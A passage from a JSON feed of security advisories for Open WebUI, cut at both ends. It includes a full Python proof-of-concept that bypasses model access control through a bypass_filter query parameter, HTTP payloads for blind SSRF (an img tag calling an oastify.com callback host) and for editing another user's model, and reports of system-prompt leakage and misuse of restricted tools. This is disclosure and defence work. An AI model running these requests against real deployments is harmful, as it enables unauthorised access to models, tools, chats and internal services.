bypass_filter and user.role == \"user\":\n        check_model_access(user, model)  # \u003c-- skipped when bypass_filter=True\n\n  This allows any authenticated user to invoke models they are not authorized\n  to use, including admin-restricted models.\n\nVULNERABLE CODE:\n  backend/open_webui/routers/openai.py, line 941 + 980:\n    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):\n        ...\n        if not bypass_filter and user.role == \"user\":\n            # ACL check — skipped when bypass_filter=True\n\n  backend/open_webui/routers/ollama.py, line 1288 + 1339:\n    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):\n        ...\n        if not bypass_filter and user.role == \"user\":\n            # ACL check — skipped when bypass_filter=True\n\nIMPACT:\n  Any authenticated user can bypass model access control on both OpenAI and\n  Ollama proxy endpoints. Because bypass_filter skips the ACL check but still\n  routes through the server-side LLM connection, the attacker can invoke\n  admin-restricted models using the server's API keys and receive actual LLM\n  responses — effectively gaining free, unauthorized access to any configured\n  model.\n\nREPRODUCTION:\n  1. Create a restricted model with empty access_grants (admin-only).\n  2. Authenticate as a regular user.\n  3. POST /openai/chat/completions with the restricted model → expect 403.\n  4. POST /openai/chat/completions?bypass_filter=true → request succeeds.\n\nREQUIREMENTS:\n  - Running Open WebUI instance with Ollama or OpenAI backend configured\n  - A model with restricted access_grants\n  - An authenticated user who is NOT granted access to that model\n\"\"\"\n\nimport argparse\nimport sys\nimport requests\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Finding #2: bypass_filter ACL bypass\")\n    parser.add_argument(\"--base-url\", required=True, help=\"Open WebUI base URL\")\n    parser.add_argument(\"--attacker-email\", required=True)\n    parser.add_argument(\"--attacker-password\", required=True)\n    parser.add_argument(\"--admin-email\", required=True)\n    parser.add_argument(\"--admin-password\", required=True)\n    args = parser.parse_args()\n\n    base = args.base_url.rstrip(\"/\")\n\n    # ── Step 1: Authenticate ──\n    print(\"[*] Authenticating as attacker...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.attacker_email, \"password\": args.attacker_password})\n    if not r.ok:\n        print(f\"[-] Login failed: {r.status_code}\")\n        sys.exit(1)\n    attacker_token = r.json()[\"token\"]\n    print(f\"[+] Logged in as attacker (id={r.json()['id']})\")\n\n    # ── Step 2: Find restricted model via admin ──\n    print(\"[*] Authenticating as admin to find restricted model...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.admin_email, \"password\": args.admin_password})\n    if not r.ok:\n        print(f\"[-] Admin login failed: {r.status_code}\")\n        sys.exit(1)\n    admin_token = r.json()[\"token\"]\n\n    r = requests.get(f\"{base}/api/v1/models\", headers={\"Authorization\": f\"Bearer {admin_token}\"})\n    if not r.ok:\n        print(f\"[-] Failed to list models: {r.status_code}\")\n        sys.exit(1)\n\n    models = r.json()\n    if isinstance(models, dict):\n        models = models.get(\"data\", models.get(\"models\", []))\n\n    restricted_model_id = None\n    base_model_id = None\n    for m in models:\n        info = m.get(\"info\", {})\n        if not info:\n            continue\n        access_grants = info.get(\"access_grants\", None)\n        if access_grants is not None and len(access_grants) == 0 and info.get(\"base_model_id\"):\n            restricted_model_id = m[\"id\"]\n            base_model_id = info.get(\"base_model_id\")\n            print(f\"[+] Found restricted model: {restricted_model_id} (base: {base_model_id})\")\n            break\n\n    if not restricted_model_id:\n        print(\"[-] No restricted model found.\")\n        sys.exit(1)\n\n    headers = {\"Authorization\": f\"Bearer {attacker_token}\"}\n    payload = {\n        \"model\": restricted_model_id,\n        \"messages\": [{\"role\": \"user\", \"content\": \"Say exactly: BYPASS_CONFIRMED\"}],\n        \"stream\": False,\n    }\n\n    # ── Step 3: Confirm access is denied on /openai/chat/completions ──\n    print(f\"\\n[*] Step 1: POST /openai/chat/completions (no bypass) with model '{restricted_model_id}'...\")\n    r = requests.post(f\"{base}/openai/chat/completions\", headers=headers, json=payload)\n    print(f\"    Response: {r.status_code} {r.text[:200]}\")\n\n    if r.status_code == 403:\n        print(\"[+] Access correctly DENIED (403) — attacker cannot use the restricted model\")\n    else:\n        print(f\"[!] Unexpected response code {r.status_code} (expected 403)\")\n\n    # ── Step 4: Bypass with ?bypass_filter=true on OpenAI endpoint ──\n    print(f\"\\n[*] Step 2: POST /openai/chat/completions?bypass_filter=true ...\")\n    r = requests.post(f\"{base}/openai/chat/completions\",\n                      headers=headers, json=payload,\n                      params={\"bypass_filter\": \"true\"})\n    print(f\"    Response: {r.status_code} {r.text[:300]}\")\n\n    openai_bypassed = r.status_code != 403\n\n    if openai_bypassed:\n        print(f\"[+] OpenAI endpoint: ACL BYPASSED (got {r.status_code} instead of 403)\")\n    else:\n        print(f\"[-] OpenAI endpoint: bypass did not work (still 403)\")\n\n    # ── Step 5: Also test Ollama endpoint ──\n    print(f\"\\n[*] Step 3: POST /ollama/api/chat?bypass_filter=true ...\")\n    ollama_payload = {\n        \"model\": restricted_model_id,\n        \"messages\": [{\"role\": \"user\", \"content\": \"Say exactly: BYPASS_CONFIRMED\"}],\n        \"stream\": False,\n    }\n    r_normal = requests.post(f\"{base}/ollama/api/chat\", headers=headers, json=ollama_payload)\n    print(f\"    Without bypass: {r_normal.status_code} {r_normal.text[:150]}\")\n\n    r_bypass = requests.post(f\"{base}/ollama/api/chat\", headers=headers, json=ollama_payload,\n                             params={\"bypass_filter\": \"true\"})\n    print(f\"    With bypass:    {r_bypass.status_code} {r_bypass.text[:150]}\")\n\n    ollama_bypassed = r_normal.status_code == 403 and r_bypass.status_code != 403\n\n    if ollama_bypassed:\n        print(f\"[+] Ollama endpoint: ACL BYPASSED ({r_normal.status_code} → {r_bypass.status_code})\")\n    elif r_bypass.status_code != 403:\n        print(f\"[+] Ollama endpoint: bypass_filter accepted (status {r_bypass.status_code})\")\n        ollama_bypassed = True\n    else:\n        print(f\"[-] Ollama endpoint: bypass did not work\")\n\n    # ── Results ──\n    if openai_bypassed or ollama_bypassed:\n        print(f\"\\n[+] SUCCESS: bypass_filter query parameter bypasses model access control!\")\n        print(f\"    OpenAI endpoint (/openai/chat/completions): {'BYPASSED' if openai_bypassed else 'not bypassed'}\")\n        print(f\"    Ollama endpoint (/ollama/api/chat):          {'BYPASSED' if ollama_bypassed else 'not bypassed'}\")\n        print(f\"\")\n        print(f\"    Any authenticated user can append ?bypass_filter=true to skip\")\n        print(f\"    check_model_access() and use admin-restricted models via the\")\n        print(f\"    server's own API keys.\")\n        sys.exit(0)\n    else:\n        print(f\"\\n[-] FAILED: bypass_filter did not bypass access control on either endpoint\")\n        sys.exit(1)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n### Impact\n\nAny authenticated user (including those with the lowest \"user\" role) can invoke any model configured on the server, regardless of access control settings. This bypasses the admin's ability to restrict which models are available to which users — for example, limiting expensive models to specific teams or keeping certain models internal-only.\n\n\n## Resolution\n\nFixed in commit [c0385f60b](https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37), first released in **v0.8.11** (Mar 2026) — one day after this report.\n\n`bypass_filter` is no longer a function parameter on either route handler. Both `routers/openai.py` and `routers/ollama.py` now read it via `getattr(request.state, 'bypass_filter', False)`. Because `request.state` can only be populated by server-side code in the same process (typically `utils/chat.py` when recursing into a base model the caller is already authorized for), external HTTP clients cannot set it via query string, body, or any other transport-level mechanism. Appending `?bypass_filter=true` to the URL has no effect — the query parameter is now silently ignored by FastAPI since it doesn't bind to any handler argument.\n\nUsers on `\u003e= 0.8.11` are not affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:25:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m","https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37","https://github.com/open-webui/open-webui/releases/tag/v0.8.11","https://nvd.nist.gov/vuln/detail/CVE-2026-45365","https://github.com/advisories/GHSA-v6qf-75pr-p96m"],"source_kind":"github","identifiers":["GHSA-v6qf-75pr-p96m","CVE-2026-45365"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.091Z","epss_percentage":0.00193,"epss_percentile":0.09085,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NnFmLTc1cHItcDk2bc4ABW48","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12NnFmLTc1cHItcDk2bc4ABW48","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.11","vulnerable_version_range":"\u003c= 0.8.10"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NnFmLTc1cHItcDk2bc4ABW48/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qaDlnLThqcXctbTJxeM4ABW47","url":"https://github.com/advisories/GHSA-jh9g-8jqw-m2qx","title":"Open WebUI Exposes System Prompt to Regular User [Non-Admin]","description":"### Summary\n_A regular user [non-admin] can view the system prompt of the model which is set by an admin._\n\n### Details\n_When a regular user [non-admin] logs into the application, a http://IP:8080/api/models? web request is initiated by the application and in response, it reveals the system prompt of available models set by admin on models pages in workspace affecting the confidentiality of application_\n\n### Affected System\n_Open WebUI v0.6.40 \"main\" branch_\n\n### Vulnerability Details and Advisory from OWASP\nLLM07:2025 System Prompt Leakage - https://genai.owasp.org/llmrisk/llm072025-system-prompt-leakage/\n\n\n### PoC\n_1. Regular User [Non-Admin] login on Open WebUI application._\n_2. A series of web requests get generated by the application, and the http://IP:8080/api/models? is also gets generated by application ._\n_3. The response of http://IP:8080/api/models? web request reveals the system prompt of all the available models which is set is by the admin on models pages in workspace._\n\u003cimg width=\"940\" height=\"352\" alt=\"system prompt leak\" src=\"https://github.com/user-attachments/assets/bd2c76f1-398f-4bc8-a8b2-5e14a768c560\" /\u003e\n\n### Web Request\nGET /api/models? HTTP/1.1\nHost: localhost:8080\nsec-ch-ua-platform: \"Linux\"\nauthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjdmYjUxMmFhLTBmMTAtNDRkZi1iOWY1LThmNDg2MWFhNWFmOCIsImV4cCI6MTc2NjU2MjE5OH0.yJpavBynKItPQv76SMGKK012JIf29PVUv9sjuCDuRGQ\nAccept-Language: en-US,en;q=0.9\nsec-ch-ua: \"Chromium\";v=\"141\", \"Not?A_Brand\";v=\"8\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36\nAccept: application/json\nContent-Type: application/json\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost:8080/\nAccept-Encoding: gzip, deflate, br\nCookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjdmYjUxMmFhLTBmMTAtNDRkZi1iOWY1LThmNDg2MWFhNWFmOCIsImV4cCI6MTc2NjU2MjE5OH0.yJpavBynKItPQv76SMGKK012JIf29PVUv9sjuCDuRGQ\nConnection: keep-alive\n\n\n### Impact\n_1. System prompts can reveal the model instructions, providing an attackers with inside knowledge about the system capabilities and bypass restrictions._\n_2. Attacker can perform content manipulation affecting the input/output of the model._\n\n### Details from MITRE ATLAS\nDiscover LLM System Information - https://atlas.mitre.org/techniques/AML.T0069\nDiscover LLM System Information: System Instruction Keywords - https://atlas.mitre.org/techniques/AML.T0069.001\nDiscover LLM System Information: System Prompt - https://atlas.mitre.org/techniques/AML.T0069.002\n\n\n### Recommendation\n_1. The web response should not reveal system prompt and related internal/back-end details regarding the model to the regular user._\n_2. Only the model name and non-sensitive details should be revealed to regular user and internal/back-end details should not be disclosed._","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:25:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jh9g-8jqw-m2qx","https://github.com/open-webui/open-webui/releases/tag/v0.8.9","https://nvd.nist.gov/vuln/detail/CVE-2026-45351","https://github.com/advisories/GHSA-jh9g-8jqw-m2qx"],"source_kind":"github","identifiers":["GHSA-jh9g-8jqw-m2qx","CVE-2026-45351"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.092Z","epss_percentage":0.00281,"epss_percentile":0.20054,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDlnLThqcXctbTJxeM4ABW47","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qaDlnLThqcXctbTJxeM4ABW47","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.9","vulnerable_version_range":"\u003c= 0.8.8"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDlnLThqcXctbTJxeM4ABW47/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00cGNnLTI1M3ItcmY5d84ABW46","url":"https://github.com/advisories/GHSA-4pcg-253r-rf9w","title":"Open WebUI's chat completion API allows tool restrictions to be bypassed","description":"### Summary\nOpen WebUI v0.6.43 contains a vulnerability in its chat completion API, which allows attackers to bypass tool restrictions, potentially enabling unauthorized actions or access.\n\n\n### Details\nIn the [chat_completion](https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/backend/open_webui/main.py#L1529) API, the parameters [tool_ids and tool_servers](https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/backend/open_webui/main.py#L1613-L1614) are supplied by the user. These parameters are used to [create a tools_dict by the middleware](https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/backend/open_webui/utils/middleware.py#L1394). This is then used by [get_tool_by_id](https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/backend/open_webui/models/tools.py#L139) to retrieve the appropriate tool. However, there is no checks in that ensures the user that uses the API has permission to use the tool, meaning that a user can invoke any server tool by supplying the correct tool_id or tool_servers parameters via the chat completion API. Moreover, the authentication token stored in the server would be used when invoking the tool, so the tool will be invoked with the server privilege.\n### PoC\nTo reproduce the issue, create an admin user and create an external tool via the admin settings. Set the type to \"MCP Streamable HTTP\" for the tool, and the url pointing to a mcp server. For example, the public instance of the [\"Fetch\" mcp server](https://github.com/modelcontextprotocol/servers/blob/main/src/fetch/README.md) can be used, which is located at \"https://remote.mcpservers.org/fetch/mcp\". Other mcp servers, e.g. the GitHub MCP server can also be used. Then set the \"Auth\" field appropriately. (Fetch mcp does not require Auth to be set).\n\nSet the ID, name and description for the MCP server and set visibility to private. This should prevent any user from using the mcp server. (For the example below, we use the fetch mcp server and set the ID to 1)\n\nNext create a user with low privilege and enable API keys from the admin settings.\n\nThen use the chat completion API with the low privilege user with a prompt specifying the use of the restricted tool, and include the id of the tool in the tool_ids parameter. For example, to use the fetch mcp server set up before:\n\n```\ndef chat_with_model(token):\n    url = 'http://localhost:3000/api/chat/completions'\n    headers = {\n        'Authorization': f'Bearer {token}',\n        'Content-Type': 'application/json'\n    }\n    data = {\n      \"model\": \"llama3.1:latest\",\n      \"messages\": [\n        {\n          \"role\": \"user\",\n          \"content\": \"Use the fetch tool to fetch content of the url https://raw.githubusercontent.com/modelcontextprotocol/servers/refs/heads/main/src/fetch/LICENSE\"\n        }],\n        \n        \"tool_ids\" : [\n            \"server:mcp:1\",\n        ],\n    }\n    response = requests.post(url, headers=headers, json=data)\n    return response.json()\n```\n\nNote that the tool will be used to fetch the content of the file, despite the tool is restricted and has it's visibility set to private\n\n### Impact\nThis issue may lead to restricted tools being invoked by users via the chat completion API\n\n## Resolution\n\nFixed across two releases\n\n- **Local Tool records** (`tool_ids: [\"\u003ctool_id\u003e\"]` referencing a stored Tool): fixed in commit [9b06fdc8f](https://github.com/open-webui/open-webui/commit/9b06fdc8fe1c933071610336be05f11e77e6c8eb), first released in **v0.7.0**. `get_tools()` in `backend/open_webui/utils/tools.py` (line 166) now resolves the caller's group memberships and rejects each requested `tool_id` whose owner isn't the caller and for which no `AccessGrants.has_access(resource_type='tool', permission='read')` grant exists. Admins continue to bypass when `BYPASS_ADMIN_ACCESS_CONTROL` is enabled (its documented UI/posture purpose).\n\n- **Admin-configured MCP servers** (`tool_ids: [\"server:mcp:\u003cid\u003e\"]`, the report's exact PoC): fixed in commit [4737e1f11](https://github.com/open-webui/open-webui/commit/4737e1f11), first released in **v0.8.6**. The MCP-resolution loop in `backend/open_webui/utils/middleware.py` (line 2670) now calls `has_connection_access(user, mcp_server_connection)` and skips the server with a warning if the user has no grant — the server's stored credentials are never used on behalf of an unauthorized caller.\n\nUsers on `\u003e= 0.8.6` are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:24:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4pcg-253r-rf9w","https://github.com/open-webui/open-webui/commit/4737e1f11","https://github.com/open-webui/open-webui/releases/tag/v0.8.6","https://nvd.nist.gov/vuln/detail/CVE-2026-45350","https://github.com/advisories/GHSA-4pcg-253r-rf9w"],"source_kind":"github","identifiers":["GHSA-4pcg-253r-rf9w","CVE-2026-45350"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.092Z","epss_percentage":0.0027,"epss_percentile":0.18961,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cGNnLTI1M3ItcmY5d84ABW46","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cGNnLTI1M3ItcmY5d84ABW46","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.6","vulnerable_version_range":"\u003c= 0.8.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cGNnLTI1M3ItcmY5d84ABW46/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nZm0yLXhtNmMtMzdxY84ABW45","url":"https://github.com/advisories/GHSA-gfm2-xm6c-37qc","title":"Open WebUI has Broken Access Control for Completions API","description":"### Summary\nAny user `X` can continue the conversation of any other user `Y`, as long as the Chat ID of `Y` is known. User `X` does not even need to be an admin to do so. \n\n### Details\nA user just needs to use the API endpoint: `/api/chat/completions` with their own API key (generated in OWUI) and the Chat ID of another user. **OWUI does not check to match the Chat ID with the user that created that Chat ID**. Note that both users will need access to the same model. This is especially relevant if there is a shared pipeline model between users. \n\n### PoC\n1. Using OWUI v0.6.18\n2. Sign in with any user `X`\n3. Generate an API Key for user `X` using the settings\n4. Create another user `Y`, and have a conversation in OWUI. Copy the Chat ID from the URL.\n5. User `X` can now use the API `/api/chat/completions` and the Chat ID from step 4 to continue the conversation of user `Y`\n\n### Impact\nLarge impact to any user in OWUI. People can read your conversations, and access private information if they know your Chat ID (which is in the URL of the chat). \n\n## Resolution\n\nFixed in commit [cf4218e68](https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67), first released in **v0.9.0** (Apr 2026). The `chat_completion` handler at `backend/open_webui/main.py:1868` now explicitly verifies chat ownership via `Chats.is_chat_owner(chat_id, user.id)` for any request that targets an existing chat, and raises 404 for non-owners (admin bypass preserved per the documented threat model). New chats (no `chat_id` supplied, or freshly inserted via the `is_new_chat` branch) are unaffected. Users on `\u003e= 0.9.0` are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:24:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-gfm2-xm6c-37qc","https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45349","https://github.com/advisories/GHSA-gfm2-xm6c-37qc"],"source_kind":"github","identifiers":["GHSA-gfm2-xm6c-37qc","CVE-2026-45349"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.093Z","epss_percentage":0.00231,"epss_percentile":0.1376,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZm0yLXhtNmMtMzdxY84ABW45","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nZm0yLXhtNmMtMzdxY84ABW45","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZm0yLXhtNmMtMzdxY84ABW45/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mNzc2LWZwNHctMjY2Y84ABW42","url":"https://github.com/advisories/GHSA-f776-fp4w-266c","title":"Open WebUI vulnerable to blind server side request forgery (SSRF) via the PDF generate function","description":"### Summary\nBlind server side request forgery (SSRF) via the PDF generate function. \nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details\nIn the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below.\n\n### PoC\nStart a chat and export the PDF:\n![grafik](https://github.com/user-attachments/assets/fbfc898d-b5fd-473f-8f6e-bdc9c7f130b7)\n\nIntercept the request and insert an `\u003cimg\u003e` tag into the `title`:\n```http\nPOST /api/v1/utils/pdf HTTP/2\nHost: domain.local\n//Some headers removed\nContent-Type: application/json\nContent-Length: 541\nTe: trailers\n\n{\"title\":\"\u003cimg src='https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com' /\u003e\",\"messages\":[{\"id\":\"81f24589-384d-431c-a26c-5cd3382ac941\",\"parentId\":null,\"childrenIds\":[\"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e\"],\"role\":\"user\",\"content\":\"hallo\",\"timestamp\":1736932102,\"models\":[\"gpt-4o-POC\"]},{\"parentId\":\"81f24589-384d-431c-a26c-5cd3382ac941\",\"id\":\"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e\",\"childrenIds\":[],\"role\":\"assistant\",\"content\":\"Hallo! Wie kann ich Ihnen helfen?\",\"model\":\"gpt-4o-POC\",\"modelName\":\"gpt-4o-POC\",\"modelIdx\":0,\"userContext\":null,\"timestamp\":1736932103,\"done\":true}]}\n```\n\nA HTTPS callback was received at https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com.\n\n### Impact\nA user can force server-side GET requests. During the available testing time, no method was found to read the responses (Blind SSRF). Nonetheless, this should be prevented, as an attacker could enumerate internal assets through response delays and trigger arbitrary GET requests.\n\n## Resolution\n\nFixed in commit [167c8bf00](https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57), first released in **v0.5.11** (2025-02). The fix wraps every user-controllable field that flows into the PDF HTML template (`title`, `content`, `role`, `model`, formatted date) in `html.escape()` before the template f-string is fed to `fpdf2.write_html()`. The PoC payload `\u003cimg src='...' /\u003e` is escaped to `\u0026lt;img src=\u0026#x27;...\u0026#x27; /\u0026gt;` and rendered as literal text by fpdf2, with no HTML parsing and no outbound request. Users on `\u003e= 0.5.11` are not affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:22:02.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c","https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57","https://github.com/open-webui/open-webui/releases/tag/v0.5.11","https://nvd.nist.gov/vuln/detail/CVE-2026-45347","https://github.com/advisories/GHSA-f776-fp4w-266c"],"source_kind":"github","identifiers":["GHSA-f776-fp4w-266c","CVE-2026-45347"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:09.094Z","epss_percentage":0.00186,"epss_percentile":0.08263,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mNzc2LWZwNHctMjY2Y84ABW42","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mNzc2LWZwNHctMjY2Y84ABW42","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.5.11","vulnerable_version_range":"\u003c 0.5.11"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mNzc2LWZwNHctMjY2Y84ABW42/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nbTU0LW0zOXctZ3JqcM4ABW40","url":"https://github.com/advisories/GHSA-gm54-m39w-grjp","title":"Open WebUI missing authorization check at the model update function - models from other users can be updated","description":"### Summary\nA user can modify another user's model even if its visibility is set to `Private`.\nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details / PoC\nThe user `Victim` created a private model with the visibility set to `private`: \n![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)\n\nThe user `Attacker` can edit this model using the following POST request:\n```\nPOST /api/v1/models/model/update?id=aaabraaa HTTP/2\nHost: domain.local\n//Some headers removed\nTe: trailers\n\n{\"id\":\"aaabraaa\",\"base_model_id\":\"gpt-4o-POC\",\"name\":\"testmodel\",\"meta\":{\"profile_image_url\":\"/static/favicon.png\",\"description\":\"\",\"capabilities\":{\"vision\":true,\"usage\":false,\"citations\":true},\"suggestion_prompts\":null,\"tags\":[],\"toolIds\":[\"test\"]},\"params\":{},\"user_id\":\"565c82e6-083f-42bb-bf0f-a4e214cfb9ad\",\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}},\"is_active\":true,\"updated_at\":1737314575,\"created_at\":1737121281}\n```\nRequest / Response\n![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)\n\n### Impact\nA user can modify another user's model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:21:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp","https://nvd.nist.gov/vuln/detail/CVE-2026-45345","https://github.com/advisories/GHSA-gm54-m39w-grjp"],"source_kind":"github","identifiers":["GHSA-gm54-m39w-grjp","CVE-2026-45345"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:09.095Z","epss_percentage":0.00226,"epss_percentile":0.13113,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nbTU0LW0zOXctZ3JqcM4ABW40","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nbTU0LW0zOXctZ3JqcM4ABW40","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.5.7","vulnerable_version_range":"\u003c= 0.5.6"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nbTU0LW0zOXctZ3JqcM4ABW40/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yNGM5LTJtOHEtcWhtaM4ABW4y","url":"https://github.com/advisories/GHSA-24c9-2m8q-qhmh","title":"Open WebUI Vulnerable to SSRF via OAuth Profile Picture URL in _process_picture_url (oauth.py)","description":"## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in `_process_picture_url()` in `backend/open_webui/utils/oauth.py` (line ~1338). The function fetches arbitrary URLs from OAuth `picture` claims without applying `validate_url()`, allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response.\n\n## Vulnerable Code\n```python\n# backend/open_webui/utils/oauth.py, line ~1337-1345\nasync def _process_picture_url(self, picture_url: str, access_token: str = None) -\u003e str:\n    # No validate_url() call here\n    async with aiohttp.ClientSession(trust_env=True) as session:\n        async with session.get(picture_url, **get_kwargs, ssl=AIOHTTP_CLIENT_SESSION_SSL) as resp:\n            if resp.ok:\n                picture = await resp.read()\n                